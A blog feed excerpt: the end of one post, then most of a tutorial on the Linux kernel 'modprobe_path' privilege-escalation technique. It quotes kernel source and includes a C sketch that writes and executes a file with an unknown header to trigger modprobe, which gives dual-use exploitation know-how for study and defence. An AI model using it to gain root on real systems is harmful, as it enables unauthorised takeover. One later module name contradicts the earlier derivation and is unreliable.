<h3 id="video-materials">Video Materials</h3>
<ul>
<li><a href="https://www.youtube.com/c/BlackHatOfficialYT">Black Hat</a> (YouTube)</li>
<li><a href="https://www.youtube.com/user/DEFCONConference">DEFCONConference</a> (YouTube)</li>
<li><a href="https://www.youtube.com/user/hitbsecconf">Hack In The Box Security Conference</a> (YouTube)</li>
<li><a href="https://www.youtube.com/c/OffensiveCon">OffensiveCon</a> (YouTube)</li>
</ul>
<h2 id="wrapping-up">Wrapping Up</h2>
<p><img src="https://sam4k.com/content/images/2022/09/itsdone.gif" alt=""></p>
<p>Oof, that was a long one, huh? Unlike my other posts, this one has covered a particularly subjective topic. Typically the content of my posts is derived from some objective source like the Linux kernel, however this one has ultimately been the culmination of my own experiences, understanding and journey into linux vred.</p>
<p>That said, I hope that at least some of the insights I&rsquo;ve shared today have been useful for you. Not everything I&rsquo;ve talked about will apply to everyone, but fingers crossed there&rsquo;s some helpful nuggets of information in there for each of you.</p>
<p>As always, I love to talk about this stuff and it means a lot to be able to help inspire and motivate people on their linux-y vred-y journeys. If you have any questions, suggestions or corrections then feel free to <a href="https://twitter.com/sam4k1">@ me or DM me on Twitter</a> :)</p>
<h3 id="change-history">Change History</h3>
<p><em>I have a feeling this will see some updates and additions, so stay tuned here for any updates to the post.</em></p>
<p>exit(0);</p>
]]></content:encoded></item><item><title>Kernel Exploitation Techniques: modprobe_path</title><description>Let&amp;#39;s kick things off with a modern day staple for local privilege escalation (LPE) in Linux Kernel Exploitation, modprobe_path.</description><link>https://sam4k.com/like-techniques-modprobe_path/</link><guid isPermaLink="false">6266f59c1b5b6d052837bff4</guid><category>linux</category><category>kernel</category><category>xdev</category><dc:creator>sam4k</dc:creator><pubDate>Mon, 04 Jul 2022 14:54:17 +0000</pubDate><media:content url="https://sam4k.com/content/images/2022/04/tired_computer-1.gif" medium="image"/><content:encoded><![CDATA[<p>I thought we&rsquo;d kick things off with a modern day staple for local privilege escalation (LPE) in <strong>Li</strong>nux <strong>K</strong>ernel <strong>E</strong>xploitation, <code>modprobe_path</code>.</p>
<p>The aim of this series on exploitation techniques is to provide byte-sized (lol, sorry) analyses on specific techniques and primitives used in kernel exploitation.</p>
<p>The focus is on explaining why and when these techniques are used and how they work, before finally touching on existing, upcoming or speculative mitigations.</p>
<h2 id="contents">Contents</h2>
<ul>
<li><a href="#overview">Overview</a></li>
<li><a href="#diving-in">Diving In</a>
<ul>
<li><a href="#the-code">The Code</a></li>
<li><a href="#a-pseudo-case-study">A Pseudo Case-Study</a>
<ul>
<li><a href="#actual-examples">Actual Examples</a>
<ul>
<li>CVE-2022-27666 by <a href="https://twitter.com/ETenal7">@Etenal7</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#mitigations">Mitigations</a>
<ul>
<li><a href="#so-were-all-good">So We&rsquo;re All Good?</a></li>
<li><a href="#alternatives">Alternatives</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#conclusion">Conclusion</a></li>
</ul>
<h2 id="overview">Overview</h2>
<p><a href="https://linux.die.net/man/8/modprobe"><code>modprobe</code></a> is a userspace program for adding and removing modules from the Linux kernel. When the kernel needs a feature that currently isn&rsquo;t loaded into the kernel, it can use <code>modprobe</code> to load in the appropriate module.</p>
<p>One example of this is when a userspace process <a href="https://linux.die.net/man/3/execve"><code>execve()</code></a>&rsquo;s a binary:</p>
<ol>
<li>the kernel will look for the appropriate binary loader</li>
<li>if the binary&rsquo;s header isn&rsquo;t recognised, it will attempt to load the appropriate module, specifically <code>binfmt-AABB</code>, where <code>AABB</code> is the 16-bit value stored in the third and fourth bytes of the binary, printed as four hex digits</li>
<li>the kernel will attempt to load the module via <code>modprobe</code>, running it as root via the absolute path stored in the titular exported kernel symbol <code>modprobe_path</code></li>
</ol>
<p>With an arbitrary address write (AAW) primitive and the address of the <code>modprobe_path</code> symbol, an attacker can overwrite <code>modprobe_path</code> with the path to a malicious binary X.</p>
<p>Then, by creating and executing a binary with an unknown header[1], an unprivileged attacker can cause the kernel to go through steps 1-3 above.</p>
<p>Except this time, it runs whatever the overwritten <code>modprobe_path</code> points to as root, i.e. malicious binary X, allowing for LPE.</p>
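<p>To make the trigger side of this a bit more concrete, here&rsquo;s a minimal userspace sketch of that last step: writing a file with an unrecognised header and trying to execute it. The helper names (<code>write_trigger()</code>, <code>run_trigger()</code>) and the choice of four <code>0xff</code> bytes are assumptions for illustration, not lifted from any particular exploit, and this only covers the trigger, not the write primitive.</p>

```c
#include <errno.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper: create an executable file whose first four bytes
 * are non-printable and (presumably) match no registered binary format. */
int write_trigger(const char *path)
{
	static const unsigned char hdr[4] = { 0xff, 0xff, 0xff, 0xff };
	int fd = open(path, O_WRONLY | O_CREAT | O_TRUNC, 0755);

	if (fd < 0)
		return -1;
	if (write(fd, hdr, sizeof(hdr)) != (ssize_t)sizeof(hdr)) {
		close(fd);
		return -1;
	}
	if (fchmod(fd, 0755) < 0) {	/* don't rely on the umask */
		close(fd);
		return -1;
	}
	return close(fd);
}

/* Hypothetical helper: execve() the file in a child process. Returns the
 * errno the child saw when execve() failed, or -1 on any other error. */
int run_trigger(const char *path)
{
	char *const argv[] = { (char *)path, NULL };
	char *const envp[] = { NULL };
	int status;
	pid_t pid = fork();

	if (pid < 0)
		return -1;
	if (pid == 0) {
		execve(path, argv, envp);
		_exit(errno & 0xff);	/* only reached if execve() failed */
	}
	if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
		return -1;
	return WEXITSTATUS(status);
}
```

<p>On an untouched system I&rsquo;d expect calling <code>write_trigger()</code> followed by <code>run_trigger()</code> on the same path to simply report a failed <code>execve()</code> (typically <code>ENOEXEC</code>); the interesting part is what the kernel tries to run on our behalf along the way.</p>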
<hr>
<ol>
<li>Specifically, as we&rsquo;ll explain later, at least one of the first 4 bytes needs to be non-<a href="https://elixir.bootlin.com/linux/v5.18.3/source/fs/exec.c#L1698"><code>printable()</code></a>, and the header can&rsquo;t belong to an already supported format</li>
</ol>
<h2 id="diving-in">Diving In</h2>
<p><img src="https://sam4k.com/content/images/2022/07/going_on_an_adventure.gif" alt=""></p>
<p>Now that we&rsquo;ve got a high level overview of what we&rsquo;re dealing with, let&rsquo;s dive into some technical details as we explore the code path to executing <code>modprobe_path</code>, use cases for this technique and how it can be leveraged by attackers. Finally we&rsquo;ll cover mitigations.</p>
<h3 id="the-code">The Code</h3>
<p>When we call the <code>execve()</code> family in userspace, directly or indirectly (such as running a program in your shell), it ultimately makes its way to the kernel via the <a href="https://man7.org/linux/man-pages/man2/execve.2.html"><code>execve</code></a> syscall:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="n">SYSCALL_DEFINE3</span><span class="p">(</span><span class="n">execve</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="k">const</span> <span class="n">char</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">filename</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="k">const</span> <span class="n">char</span> <span class="n">__user</span> <span class="o">*</span><span class="k">const</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">argv</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="k">const</span> <span class="n">char</span> <span class="n">__user</span> <span class="o">*</span><span class="k">const</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">envp</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="n">do_execve</span><span class="p">(</span><span class="n">getname</span><span class="p">(</span><span class="n">filename</span><span class="p">),</span> <span class="n">argv</span><span class="p">,</span> <span class="n">envp</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c">fs/exec.c</a> (v5.18.5)</p>
<p>We&rsquo;ll not get too bogged down in how programs actually get run in Linux; there&rsquo;s plenty of great content out there on the topic[1].</p>
<p>What we&rsquo;re interested in is the fact that in order to execute the program specified by <code>filename</code>, the kernel needs to understand what it&rsquo;s trying to execute.</p>
<p>As mentioned earlier, part of this process involves <a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L1702"><code>search_binary_handler(struct linux_binprm *bprm)</code></a>, where <a href="https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L18"><code>struct linux_binprm</code></a> is the binary parameter struct which is used by the kernel to &ldquo;hold the arguments that are used when loading binaries&rdquo;[2].</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">[#0] search_binary_handler(...)
</span></span><span class="line"><span class="cl">[#1] exec_binprm(...)
</span></span><span class="line"><span class="cl">[#2] bprm_execve(...)
</span></span><span class="line"><span class="cl">[#3] do_execveat_common(...)
</span></span><span class="line"><span class="cl">[#4] do_execve(...)
</span></span><span class="line"><span class="cl">[#5] SYSCALL_DEFINE3(execve,...) 
</span></span><span class="line"><span class="cl">[#6] userspace makes execve() syscall
</span></span></code></pre></div><p>Pseudo-backtrace up to <code>search_binary_handler()</code></p>
<p>As per the source comments, this function &ldquo;<em>cycle[s] the list of binary formats handler, until one recognizes the image</em>&rdquo;. These binary format handlers are represented by <a href="https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/binfmts.h#L85"><code>struct linux_binfmt</code></a> and are stored in the doubly linked list, <a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L82"><code>formats</code></a>.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="k">static</span> <span class="ne">int</span> <span class="n">search_binary_handler</span><span class="p">(</span><span class="n">struct</span> <span class="n">linux_binprm</span> <span class="o">*</span><span class="n">bprm</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="ne">bool</span> <span class="n">need_retry</span> <span class="o">=</span> <span class="n">IS_ENABLED</span><span class="p">(</span><span class="n">CONFIG_MODULES</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="n">struct</span> <span class="n">linux_binfmt</span> <span class="o">*</span><span class="n">fmt</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="ne">int</span> <span class="n">retval</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">    
</span></span><span class="line"><span class="cl">	<span class="o">...</span>
</span></span><span class="line"><span class="cl"> <span class="n">retry</span><span class="p">:</span>
</span></span><span class="line"><span class="cl">	<span class="n">read_lock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">binfmt_lock</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="n">list_for_each_entry</span><span class="p">(</span><span class="n">fmt</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">formats</span><span class="p">,</span> <span class="n">lh</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">try_module_get</span><span class="p">(</span><span class="n">fmt</span><span class="o">-&gt;</span><span class="n">module</span><span class="p">))</span>
</span></span><span class="line"><span class="cl">			<span class="k">continue</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">read_unlock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">binfmt_lock</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">		<span class="n">retval</span> <span class="o">=</span> <span class="n">fmt</span><span class="o">-&gt;</span><span class="n">load_binary</span><span class="p">(</span><span class="n">bprm</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">		<span class="n">read_lock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">binfmt_lock</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="n">put_binfmt</span><span class="p">(</span><span class="n">fmt</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="n">bprm</span><span class="o">-&gt;</span><span class="n">point_of_no_return</span> <span class="o">||</span> <span class="p">(</span><span class="n">retval</span> <span class="o">!=</span> <span class="o">-</span><span class="n">ENOEXEC</span><span class="p">))</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">			<span class="n">read_unlock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">binfmt_lock</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">			<span class="k">return</span> <span class="n">retval</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="p">}</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">	<span class="n">read_unlock</span><span class="p">(</span><span class="o">&amp;</span><span class="n">binfmt_lock</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">need_retry</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="n">printable</span><span class="p">(</span><span class="n">bprm</span><span class="o">-&gt;</span><span class="n">buf</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="n">printable</span><span class="p">(</span><span class="n">bprm</span><span class="o">-&gt;</span><span class="n">buf</span><span class="p">[</span><span class="mi">1</span><span class="p">])</span> <span class="o">&amp;&amp;</span>
</span></span><span class="line"><span class="cl">		    <span class="n">printable</span><span class="p">(</span><span class="n">bprm</span><span class="o">-&gt;</span><span class="n">buf</span><span class="p">[</span><span class="mi">2</span><span class="p">])</span> <span class="o">&amp;&amp;</span> <span class="n">printable</span><span class="p">(</span><span class="n">bprm</span><span class="o">-&gt;</span><span class="n">buf</span><span class="p">[</span><span class="mi">3</span><span class="p">]))</span>
</span></span><span class="line"><span class="cl">			<span class="k">return</span> <span class="n">retval</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="n">request_module</span><span class="p">(</span><span class="s2">&#34;binfmt-</span><span class="si">%04x</span><span class="s2">&#34;</span><span class="p">,</span> <span class="o">*</span><span class="p">(</span><span class="n">ushort</span> <span class="o">*</span><span class="p">)(</span><span class="n">bprm</span><span class="o">-&gt;</span><span class="n">buf</span> <span class="o">+</span> <span class="mi">2</span><span class="p">))</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">			<span class="k">return</span> <span class="n">retval</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">need_retry</span> <span class="o">=</span> <span class="bp">false</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">		<span class="n">goto</span> <span class="n">retry</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="p">}</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="n">retval</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L1702">fs/exec.c</a> (v5.18.5)</p>
<p>Looking at the code above, we can see that <code>search_binary_handler()</code> iterates over each binary format in <code>formats</code> [line 10]. As we iterate over each format, we see if that format&rsquo;s <code>load_binary()</code>[3] implementation can process our <code>bprm</code> (which contains a buffer, <code>buf</code>, of up to the first <a href="https://elixir.bootlin.com/linux/v5.18.5/source/include/uapi/linux/binfmts.h#L19"><code>BINPRM_BUF_SIZE</code></a> bytes of data from our executable) [line 15].</p>
<p>If we managed to load the binary, we can return successfully [line 21], otherwise if we&rsquo;ve tried all the formats in <code>formats</code> and <code>CONFIG_MODULES</code>[4] is set, we hit the block starting at line 26.</p>
<p>Then comes the check [line 27] we mentioned earlier: if the first 4 bytes of our executable are all <code>printable()</code>, we return here.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cp">#define printable(c) (((c)==&#39;\t&#39;) || ((c)==&#39;\n&#39;) || (0x20&lt;=(c) &amp;&amp; (c)&lt;=0x7e))
</span></span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v5.18.5/source/fs/exec.c#L1698">fs/exec.c</a> (v5.18.5)</p>
<p><code>printable()</code> is a simple macro that yields true if char <code>c</code> is an ASCII printable character (a tab, newline, space or other ASCII characters you see on your keyboard).</p>
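<p>As a quick sanity check of which headers get past this early return, here&rsquo;s a small userspace sketch that reuses the macro above. The helper <code>header_all_printable()</code> is a made-up name for illustration; it just mirrors the four-byte check in <code>search_binary_handler()</code>, so a <code>true</code> result means the kernel would bail out before ever requesting a module.</p>

```c
#include <stdbool.h>
#include <stddef.h>

/* Same definition as the kernel macro shown above (fs/exec.c, v5.18.5). */
#define printable(c) (((c) == '\t') || ((c) == '\n') || (0x20 <= (c) && (c) <= 0x7e))

/* Hypothetical helper mirroring the early-return check in
 * search_binary_handler(): true means all four leading bytes are
 * printable, so no module lookup would be attempted. For this sketch,
 * inputs shorter than four bytes are treated as not all printable. */
bool header_all_printable(const unsigned char *buf, size_t len)
{
	if (len < 4)
		return false;
	return printable(buf[0]) && printable(buf[1]) &&
	       printable(buf[2]) && printable(buf[3]);
}
```

<p>So a shell script starting <code>#!/b</code> is all printable, whereas an ELF header is not, as its leading <code>0x7f</code> byte falls just outside the <code>0x7e</code> upper bound; neither is a header of four <code>0xff</code> bytes.</p>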
<p>So, if the first four bytes of the binary contain one or more non-<code>printable()</code> bytes[5] then comes the interesting part [line 30]: the kernel will attempt to find the appropriate binary format handler by trying to load a module of the expected name &ldquo;binfmt-WXYZ&rdquo;, where WXYZ is the four-digit hex representation of the 16-bit value stored in the third and fourth bytes of our executable (note the <code>%04x</code> format and the <code>bprm-&gt;buf + 2</code> offset).</p>
<p>For reference we can find the following modules in the kernel (where <code>-</code> and <code>_</code> are interchangeable in module names): <code>binfmt_elf</code>, <code>binfmt_script</code>, <code>binfmt_aout</code>. If we tried to <code>execve()</code> a binary whose first four bytes were <code>0xFFFFFFFF</code>, the kernel thread handling the <code>execve()</code> syscall would ultimately reach line 30 and try to <code>request_module(&quot;binfmt-ffff&quot;)</code>.</p>
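<p>Going by the format string in the code above, the requested name is built from a 16-bit value read at offset 2 of the buffer. Here&rsquo;s a rough userspace sketch of that formatting step; <code>binfmt_module_name()</code> is a hypothetical helper, and it uses <code>memcpy()</code> rather than the kernel&rsquo;s pointer cast purely to keep the example portable.</p>

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper: build the module name the same way the
 * request_module("binfmt-%04x", ...) call above would. buf must hold at
 * least four bytes. Returns the length snprintf() reports. */
int binfmt_module_name(const unsigned char *buf, char *out, size_t outlen)
{
	unsigned short magic;

	/* The kernel casts (bprm->buf + 2) to ushort *; memcpy() reads the
	 * same two bytes without alignment or aliasing concerns. */
	memcpy(&magic, buf + 2, sizeof(magic));
	return snprintf(out, outlen, "binfmt-%04x", (unsigned int)magic);
}
```

<p>Feeding it four <code>0xff</code> bytes yields <code>binfmt-ffff</code>. For headers where the third and fourth bytes differ, the digit order depends on the machine&rsquo;s endianness, since the two bytes are read as a native 16-bit integer.</p>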
<p>If we take a look at how <code>request_module()</code> is implemented, we can see that it is actually a macro for <code>__request_module()</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">__request_module</span><span class="p">(</span><span class="kt">bool</span> <span class="n">wait</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">name</span><span class="p">,</span> <span class="p">...);</span>
</span></span><span class="line"><span class="cl"><span class="cp">#define request_module(mod...) __request_module(true, mod)
</span></span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v5.18.5/source/include/linux/kmod.h#L24">include/linux/kmod.h</a> (v5.18.5)</p>
<p>Taking a look at <code>__request_module()</code>, we can see that after carrying out the necessary sanity and security checks, it ultimately calls <code>call_modprobe()</code> [line 29]:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="cm">/**
</span></span></span><span class="line"><span class="cl"><span class="cm"> * __request_module - try to load a kernel module
</span></span></span><span class="line"><span class="cl"><span class="cm"> * @wait: wait (or not) for the operation to complete
</span></span></span><span class="line"><span class="cl"><span class="cm"> * @fmt: printf style format string for the name of the module
</span></span></span><span class="line"><span class="cl"><span class="cm"> * @...: arguments as specified in the format string
</span></span></span><span class="line"><span class="cl"><span class="cm"> ...
</span></span></span><span class="line"><span class="cl"><span class="cm"> * If module auto-loading support is disabled then this function
</span></span></span><span class="line"><span class="cl"><span class="cm"> * simply returns -ENOENT.
</span></span></span><span class="line"><span class="cl"><span class="cm"> */</span>
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">__request_module</span><span class="p">(</span><span class="kt">bool</span> <span class="n">wait</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">fmt</span><span class="p">,</span> <span class="p">...)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="n">va_list</span> <span class="n">args</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="kt">char</span> <span class="n">module_name</span><span class="p">[</span><span class="n">MODULE_NAME_LEN</span><span class="p">];</span>
</span></span><span class="line"><span class="cl">	<span class="kt">int</span> <span class="n">ret</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">modprobe_path</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span>
</span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">ret</span> <span class="o">&gt;=</span> <span class="n">MODULE_NAME_LEN</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="o">-</span><span class="n">ENAMETOOLONG</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">ret</span> <span class="o">=</span> <span class="nf">security_kernel_module_request</span><span class="p">(</span><span class="n">module_name</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="n">ret</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl">	<span class="n">ret</span> <span class="o">=</span> <span class="nf">call_modprobe</span><span class="p">(</span><span class="n">module_name</span><span class="p">,</span> <span class="n">wait</span> <span class="o">?</span> <span class="nl">UMH_WAIT_PROC</span> <span class="p">:</span> <span class="n">UMH_WAIT_EXEC</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v5.18.5/source/kernel/kmod.c#L124">kernel/kmod.c</a> (v5.18.5)</p>
<p>Finally (we&rsquo;re almost there, I promise!) we reach <code>call_modprobe()</code>. I&rsquo;ll avoid spamming you with more source, but for context, <a href="https://www.kernel.org/doc/htmldocs/kernel-api/API-call-usermodehelper-setup.html"><code>call_usermodehelper_setup()</code></a> [line 25] prepares the kernel to &ldquo;call a usermode helper&rdquo;, which for us right now essentially means running an executable in userspace as root. <a href="https://www.kernel.org/doc/htmldocs/kernel-api/API-call-usermodehelper-exec.html"><code>call_usermodehelper_exec()</code></a> [line 30] then does the job.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="k">static</span> <span class="kt">int</span> <span class="nf">call_modprobe</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">module_name</span><span class="p">,</span> <span class="kt">int</span> <span class="n">wait</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">struct</span> <span class="n">subprocess_info</span> <span class="o">*</span><span class="n">info</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="k">static</span> <span class="kt">char</span> <span class="o">*</span><span class="n">envp</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;HOME=/&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;TERM=linux&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="s">&#34;PATH=/sbin:/usr/sbin:/bin:/usr/bin&#34;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">		<span class="nb">NULL</span>
</span></span><span class="line"><span class="cl">	<span class="p">};</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="kt">char</span> <span class="o">**</span><span class="n">argv</span> <span class="o">=</span> <span class="nf">kmalloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="p">[</span><span class="mi">5</span><span class="p">]),</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">argv</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">module_name</span> <span class="o">=</span> <span class="nf">kstrdup</span><span class="p">(</span><span class="n">module_name</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">module_name</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">goto</span> <span class="n">free_argv</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">argv</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">modprobe_path</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;-q&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;--&#34;</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">	<span class="n">argv</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="n">module_name</span><span class="p">;</span>	<span class="cm">/* check free_modprobe_argv() */</span>
</span></span><span class="line"><span class="cl">	<span class="n">argv</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="n">info</span> <span class="o">=</span> <span class="nf">call_usermodehelper_setup</span><span class="p">(</span><span class="n">modprobe_path</span><span class="p">,</span> <span class="n">argv</span><span class="p">,</span> <span class="n">envp</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">,</span>
</span></span><span class="line"><span class="cl">					 <span class="nb">NULL</span><span class="p">,</span> <span class="n">free_modprobe_argv</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">info</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">		<span class="k">goto</span> <span class="n">free_module_name</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">	<span class="k">return</span> <span class="nf">call_usermodehelper_exec</span><span class="p">(</span><span class="n">info</span><span class="p">,</span> <span class="n">wait</span> <span class="o">|</span> <span class="n">UMH_KILLABLE</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">	<span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>On lines 19-23 you can see the argument vector we&rsquo;re using. So in our current context of a typical Linux system these days, trying to execute a binary beginning <code>0xFFFFFFFF</code>, as an unprivileged user we&rsquo;d ultimately be running the bash equivalent of:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-sh" data-lang="sh"><span class="line"><span class="cl">root# /usr/bin/modprobe -q -- binfmt-FFFFFFFF   
</span></span></code></pre></div><p>Where <code>/usr/bin/modprobe</code> is the value found in the kernel symbol <code>modprobe_path</code>.</p>
<p>What&rsquo;s important here is that the binary being executed in this root process is defined by the value of the kernel symbol <code>modprobe_path</code>.</p>
<h3 id="a-pseudo-case-study">A Pseudo Case-Study</h3>
<p>To recap what we&rsquo;ve covered so far:</p>
<ul>
<li>An unprivileged user can create a binary starting <code>0xFFFFFFFF</code> and try to <code>execve()</code> it, causing the kernel to create a root process running the equivalent of <code>$modprobe_path -q -- binfmt-FFFFFFFF</code>, where <code>$modprobe_path</code> here is the value stored in the kernel symbol <code>modprobe_path</code></li>
